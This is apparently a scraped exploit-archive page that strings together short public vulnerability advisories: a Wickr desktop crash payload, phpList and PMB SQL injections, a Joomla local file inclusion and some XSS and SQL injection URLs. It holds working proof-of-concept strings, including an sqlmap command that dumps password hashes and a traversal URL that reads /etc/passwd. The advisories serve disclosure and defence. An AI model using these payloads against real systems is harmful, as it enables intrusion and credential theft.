Timeline: ================================== 2014-12-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Wickr Inc. Product: Wickr - Desktop Software (Windows) 2.2.1 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software. The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads. The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include special crafted symbole strings as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`- and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception. The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the vulnerability results in an application crash or service shutdown. Vulnerable Module(s): [+] friend contacts [+] wickr password auth [+] friends Vulnerbale Input(s): [+] add friends (name) [+] wickr password auth [+] change friend (update name) Vulnerable Parameter(s): [+] name (value input) [+] password (vale input) Proof of Concept (PoC): ======================= The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4) 2. Install the wickr windows version of the software to your windows 8 box 3. Create an new account and include the payload to the password input field Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago. 4. Successful reproduce of the first issue! 5. We register a new account with regular values 6. Open the friends > add friends section and include the payload to the search input value Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago. 7. Successful reproduce of the second issue! 8. We open the software again and login. Switch to the existing friends contacts and edit the profile 9. Include in the name values the payload and save the settings Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago. 4. Successful reproduce of the third issue! Payload: Denial of Service ็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็ --- Error Report Logs --- EventType=APPCRASH EventTime=130628671359850105 ReportType=2 Consent=1 UploadTime=130628671360390638 ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7 IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7 WOW64=1 NsAppName=Wickr.exe Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8 Response.BucketTable=1 Response.LegacyBucketId=73726044048 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=Wickr.exe Sig[1].Name=Anwendungsversion Sig[1].Value=0.0.0.0 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=02849d78 Sig[3].Name=Fehlermodulname Sig[3].Value=CFLite.dll Sig[4].Name=Fehlermodulversion Sig[4].Value=0.0.0.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=53f6c178 Sig[6].Name=Ausnahmecode Sig[6].Value=c0000005 Sig[7].Name=Ausnahmeoffset Sig[7].Value=00027966 DynamicSig[1].Name=Betriebsystemversion DynamicSig[1].Value=6.3.9600.2.0.0.256.48 DynamicSig[2].Name=Gebietsschema-ID DynamicSig[2].Value=1031 DynamicSig[22].Name=Zusatzinformation 1 DynamicSig[22].Value=5861 DynamicSig[23].Name=Zusatzinformation 2 DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2 DynamicSig[24].Name=Zusatzinformation 3 DynamicSig[24].Value=84a0 DynamicSig[25].Name=Zusatzinformation 4 DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6 UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe UI[3]=Wickr.exe funktioniert nicht mehr UI[4]=Windows kann online nach einer Lösung für das Problem suchen. UI[5]=Online nach einer Lösung suchen und das Programm schließen UI[6]=Später online nach einer Lösung suchen und das Programm schließen UI[7]=Programm schließen ... ... ... ... LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll State[0].Key=Transport.DoneStage1 State[0].Value=1 FriendlyEventName=Nicht mehr funktionsfähig ConsentKey=APPCRASH AppName=Wickr.exe AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe NsPartner=windows NsGroup=windows8 ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE Security Risk: ============== The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

phpList 3.0.6/3.0.10 - SQL Injection

HACKER · %s · %s

Document Title: =============== PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1358 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1358 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the GNU General Public License (GPL). Most popular open source newsletter manager. Easy permission marketing. Free to download, easy to install and integrate, Versatile and extensible. Over 10,000 downloads a month. (Copy of the Vendor Homepage: https://www.phplist.com/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official PHPList v3.0.6 & v3.0.10 web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PHPList Limited Product: PHPList - Web Application 3.0.6 - 3.0.10 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A sql injection web vulnerability has been discovered in the official PHPLIST v3.0.6 & v3.0.10 open source web-application. The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms. The sql injection vulnerability is located in the abo user search engine of the phplist application. Local privileged accounts are able to inject own sql commands by usage of vulnerable findby value in the abo user search module. A successful attack requires to manipulate a GET method request with vulnerable findby value. The injection is a basic order by sql injection that allows to compromise the web-application. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the application-side web vulnerability requires a low privileged web-application user account and no user interaction. Successful exploitation of the security vulnerability result in web-application and database management system compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Abonnenten suchen > Abonnenten finden > Abonnenten finden Vulnerable Parameter(s): [+] findby Proof of Concept (PoC): ======================= The sql injection web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Abonnenten suchen > Abonnenten finden > Abonnenten finden http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=-1'[SQL INJECTION VULNERABILITY!]-- --- SQL Error Session Logs --- Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1 - Database error 1054 while doing query Unknown column '10' in 'order clause' Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1 Reference(s): http://phplist.127.0.0.1:8080/lists/ http://phplist.127.0.0.1:8080/lists/admin/ http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0 http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=1 Solution - Fix & Patch: ======================= The vulnerability can be patched by a restriction of the findby parameter in the abo user search module. Encode and parse the input values to prevent sql injection attacks. Use a prepared statement to secure the point were the app communicates with the local dbms. Disallow that php code errors becomes visible - error(0). Security Risk: ============== The security risk of the sql injection web vulnerability in the findby value of the abo user search module is estimated as high. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

PMB 4.1.3 - (Authenticated) SQL Injection

HACKER · %s · %s

# Exploit Title: PMB <= 4.1.3 Post-Auth SQL Injection Vulnerability # Google Dork: inurl:opac_css # Date: 25-12-2014 # Exploit Author: XD4rker (Ismail Belkacim) # Email: xd4rker[at]gmail.com # Twitter: @xd4rker # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 4.1.3 (Tested against version 4.1.3, 4.1.2 and 3.4.16) -==== Software Description ====- PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. The main functions of PMB are : * Supporting the UNIMARC format * Authorities management (authors, publishers, series, subjects...) * Management of loans, holds, borrowers... * A user-friendly configuration * The ability to import full bibliographic records * A user-friendly OPAC integrating a browser * Loans management with a module designed to serve even the very small establishments * Serials management * Simple administration procedures that can be handled easily even by the library staff... -==== Vulnerability ====- Variable $notice_id isn't properly sanitized in file classes/mono_display.class.php, which allows authenticated users to execute arbitrary SQL commands via the id parameter. -==== POC ====- http://localhost/[PMB_PATH]/catalog.php?categ=isbd&id=9 [SQLI] Using SQLMAP : ./sqlmap.py -u "http://localhost/[PMB_PATH]/catalog.php?categ=isbd&id=9" -p id --headers="Cookie: [VALID_USER_COOKIE]" --passwords -==== Exploit requirements ====- - You will need to be logged in in order to exploit the vulnerability.
HireHackking

Joomla! Component com_phocadownload - Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47399/info The 'com_phocadownload' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/index.php?option=com_phocadownload&controller=../../../../../../../../../../etc/passwd%00
HireHackking
source: https://www.securityfocus.com/bid/47421/info Ultra Marketing Enterprises CMS and Cart is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/index.php?id=[Sql Injection] http://www.example.com/product.php?id=[Sql Injection]
HireHackking

WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47423/info The WP-StarsRateBox plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WP-StarsRateBox 1.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/wp-starsratebox/wp-starsratebox.php?p=1&j=SQL_CODE_HERE
HireHackking

ChatLakTurk PHP Botlu Video - 'ara.php' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47428/info ChatLakTurk PHP Botlu Video is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/ara.php?ara=[xss]